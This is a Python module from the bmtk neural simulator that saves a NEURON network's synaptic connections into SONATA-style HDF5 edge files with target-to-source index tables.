396aa7d766efce4140f100be9476c86629b27ef9 | 11,383 | py | Python | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | ["BSD-3-Clause"] | 1 | 2019-03-27T12:23:09.000Z | 2019-03-27T12:23:09.000Z | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | ["BSD-3-Clause"] | null | null | null | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | ["BSD-3-Clause"] | null | null | null |
import os
import csv
import h5py
import numpy as np
from neuron import h
from .sim_module import SimulatorMod
from bmtk.simulator.bionet.biocell import BioCell
from bmtk.simulator.bionet.io_tools import io
from bmtk.simulator.bionet.pointprocesscell import PointProcessCell
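# NEURON's ParallelContext provides this process's MPI rank and the total number of MPI processes.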
pc = h.ParallelContext()
MPI_RANK = int(pc.id())
N_HOSTS = int(pc.nhost())
class SaveSynapses(SimulatorMod):
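# Simulator module that writes the instantiated synaptic connections back to disk as SONATA-style
# '{src}_{trg}_edges.h5' files, one per (source population, target population) pair.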
def __init__(self, network_dir, single_file=False, **params):
self._network_dir = network_dir
self._virt_lookup = {}
self._gid_lookup = {}
self._sec_lookup = {}
if not os.path.exists(network_dir):
os.makedirs(network_dir)
if N_HOSTS > 1:
io.log_exception('save_synapses module is not currently supported with MPI')
self._syn_writer = ConnectionWriter(network_dir)
def _print_nc(self, nc, src_nid, trg_nid, cell, src_pop, trg_pop, edge_type_id):
if isinstance(cell, BioCell):
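# nc.postloc() pushes the postsynaptic section onto NEURON's section stack and returns the synapse location x on
# that section; h.cas() then returns the currently accessed section and h.pop_section() restores the stack.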
sec_x = nc.postloc()
sec = h.cas()
sec_id = self._sec_lookup[cell.gid][sec] #cell.get_section_id(sec)
h.pop_section()
self._syn_writer.add_bio_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0], sec_id, sec_x)
# print '{} ({}) <-- {} ({}), {}, {}, {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay, sec_id, sec_x)
else:
self._syn_writer.add_point_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0])
#print '{} ({}) <-- {} ({}), {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay)
def initialize(self, sim):
io.log_info('Saving network connections. This may take a while.')
# Need a way to look up virtual nodes from nc.pre()
for pop_name, nodes_table in sim.net._virtual_nodes.items():
for node_id, virt_node in nodes_table.items():
self._virt_lookup[virt_node.hobj] = (pop_name, node_id)
# Need to figure out node_id and pop_name from nc.srcgid()
for node_pop in sim.net.node_populations:
pop_name = node_pop.name
for node in node_pop[0::1]:
if node.model_type != 'virtual':
self._gid_lookup[node.gid] = (pop_name, node.node_id)
for gid, cell in sim.net.get_local_cells().items():
trg_pop, trg_id = self._gid_lookup[gid]
if isinstance(cell, BioCell):
#from pprint import pprint
#pprint({i: s_name for i, s_name in enumerate(cell.get_sections())})
#exit()
# sections = cell._syn_seg_ix
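# Map each NEURON section of the cell to an integer id so synapse locations can be stored as (sec_id, sec_x) pairs.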
self._sec_lookup[gid] = {sec_name: sec_id for sec_id, sec_name in enumerate(cell.get_sections_id())}
else:
sections = [-1]*len(cell.netcons)
for nc, edge_type_id in zip(cell.netcons, cell._edge_type_ids):
src_gid = int(nc.srcgid())
if src_gid == -1:
# source is a virtual node
src_pop, src_id = self._virt_lookup[nc.pre()]
else:
src_pop, src_id = self._gid_lookup[src_gid]
self._print_nc(nc, src_id, trg_id, cell, src_pop, trg_pop, edge_type_id)
self._syn_writer.close()
io.log_info(' Done saving network connections.')
class ConnectionWriter(object):
class H5Index(object):
def __init__(self, network_dir, src_pop, trg_pop):
# TODO: Merge with NetworkBuilder code for building SONATA files
self._nsyns = 0
self._n_biosyns = 0
self._n_pointsyns = 0
self._block_size = 5
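# Datasets start at _block_size rows and are grown in _block_size increments as edges are added;
# clean_ends() trims them to the exact counts at the end.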
self._pop_name = '{}_{}'.format(src_pop, trg_pop)
self._h5_file = h5py.File(os.path.join(network_dir, '{}_edges.h5'.format(self._pop_name)), 'w')
self._pop_root = self._h5_file.create_group('/edges/{}'.format(self._pop_name))
self._pop_root.create_dataset('edge_group_id', (self._block_size, ), dtype=np.uint16,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('source_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['source_node_id'].attrs['node_population'] = src_pop
self._pop_root.create_dataset('target_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['target_node_id'].attrs['node_population'] = trg_pop
self._pop_root.create_dataset('edge_type_id', (self._block_size, ), dtype=np.uint32,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/syn_weight', (self._block_size, ), dtype=np.float64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_x', (self._block_size, ), chunks=(self._block_size, ),
maxshape=(None, ), dtype=np.float64)
self._pop_root.create_dataset('1/syn_weight', (self._block_size, ), dtype=np.float64,
chunks=(self._block_size, ), maxshape=(None, ))
def _add_conn(self, edge_type_id, src_id, trg_id, grp_id):
self._pop_root['edge_type_id'][self._nsyns] = edge_type_id
self._pop_root['source_node_id'][self._nsyns] = src_id
self._pop_root['target_node_id'][self._nsyns] = trg_id
self._pop_root['edge_group_id'][self._nsyns] = grp_id
self._nsyns += 1
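# Grow the shared per-edge datasets by one block whenever the current block is full.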
if self._nsyns % self._block_size == 0:
self._pop_root['edge_type_id'].resize((self._nsyns + self._block_size,))
self._pop_root['source_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['target_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['edge_group_id'].resize((self._nsyns + self._block_size, ))
def add_bio_conn(self, edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x):
self._add_conn(edge_type_id, src_id, trg_id, 0)
self._pop_root['0/syn_weight'][self._n_biosyns] = syn_weight
self._pop_root['0/sec_id'][self._n_biosyns] = sec_id
self._pop_root['0/sec_x'][self._n_biosyns] = sec_x
self._n_biosyns += 1
if self._n_biosyns % self._block_size == 0:
self._pop_root['0/syn_weight'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_id'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_x'].resize((self._n_biosyns + self._block_size, ))
def add_point_conn(self, edge_type_id, src_id, trg_id, syn_weight):
self._add_conn(edge_type_id, src_id, trg_id, 1)
self._pop_root['1/syn_weight'][self._n_pointsyns] = syn_weight
self._n_pointsyns += 1
if self._n_pointsyns % self._block_size == 0:
self._pop_root['1/syn_weight'].resize((self._n_pointsyns + self._block_size, ))
def clean_ends(self):
self._pop_root['source_node_id'].resize((self._nsyns,))
self._pop_root['target_node_id'].resize((self._nsyns,))
self._pop_root['edge_group_id'].resize((self._nsyns,))
self._pop_root['edge_type_id'].resize((self._nsyns,))
self._pop_root['0/syn_weight'].resize((self._n_biosyns,))
self._pop_root['0/sec_id'].resize((self._n_biosyns,))
self._pop_root['0/sec_x'].resize((self._n_biosyns,))
self._pop_root['1/syn_weight'].resize((self._n_pointsyns,))
eg_ds = self._pop_root.create_dataset('edge_group_index', (self._nsyns, ), dtype=np.uint64)
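# edge_group_index stores, for every edge, its row index within its own group
# (group 0 = biophysical synapses, group 1 = point-process synapses).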
bio_count, point_count = 0, 0
for idx, grp_id in enumerate(self._pop_root['edge_group_id']):
if grp_id == 0:
eg_ds[idx] = bio_count
bio_count += 1
elif grp_id == 1:
eg_ds[idx] = point_count
point_count += 1
self._create_index('target')
def _create_index(self, index_type='target'):
if index_type == 'target':
edge_nodes = np.array(self._pop_root['target_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/target_to_source')
elif index_type == 'source':
edge_nodes = np.array(self._pop_root['source_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/source_to_target')
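# Build the node-id -> edge-range index: a trailing -1 sentinel forces the final range to be flushed;
# node_id_to_range maps each node id to its span of ranges and range_to_edge_id stores the (begin, end)
# edge indices of each range.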
edge_nodes = np.append(edge_nodes, [-1])
n_targets = np.max(edge_nodes)
ranges_list = [[] for _ in range(n_targets + 1)]  # range() for Python 3 compatibility (was xrange)
n_ranges = 0
begin_index = 0
cur_trg = edge_nodes[begin_index]
for end_index, trg_gid in enumerate(edge_nodes):
if cur_trg != trg_gid:
ranges_list[cur_trg].append((begin_index, end_index))
cur_trg = int(trg_gid)
begin_index = end_index
n_ranges += 1
node_id_to_range = np.zeros((n_targets + 1, 2))
range_to_edge_id = np.zeros((n_ranges, 2))
range_index = 0
for node_index, trg_ranges in enumerate(ranges_list):
if len(trg_ranges) > 0:
node_id_to_range[node_index, 0] = range_index
for r in trg_ranges:
range_to_edge_id[range_index, :] = r
range_index += 1
node_id_to_range[node_index, 1] = range_index
output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64')
output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64')
def __init__(self, network_dir):
self._network_dir = network_dir
self._pop_groups = {}
def _group_key(self, src_pop, trg_pop):
return (src_pop, trg_pop)
def _get_edge_group(self, src_pop, trg_pop):
grp_key = self._group_key(src_pop, trg_pop)
if grp_key not in self._pop_groups:
self._pop_groups[grp_key] = self.H5Index(self._network_dir, src_pop, trg_pop)
return self._pop_groups[grp_key]
def add_bio_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight, sec_id, sec_x):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_bio_conn(edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x)
def add_point_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_point_conn(edge_type_id, src_id, trg_id, syn_weight)
def close(self):
for _, h5index in self._pop_groups.items():
h5index.clean_ends()